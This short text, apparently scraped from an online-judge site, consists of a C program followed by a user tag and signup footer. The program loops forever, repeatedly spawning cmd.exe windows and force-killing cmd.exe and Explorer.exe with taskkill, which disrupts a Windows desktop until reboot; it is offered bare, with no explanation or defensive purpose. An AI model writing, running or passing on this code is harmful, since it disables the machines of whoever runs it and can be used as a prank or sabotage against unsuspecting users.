#include<stdio.h> #include<stdlib.h> int main(){ while(1) { system("start cmd.exe"); system("taskkill/f/im cmd.exe"); system("taskkill/f/im Explorer.exe"); } return 0; }
C20250018 LV 6
By signing up a HFOJ universal account, you can submit code and join discussions in all online judging services provided by us.
Using your HFOJ universal account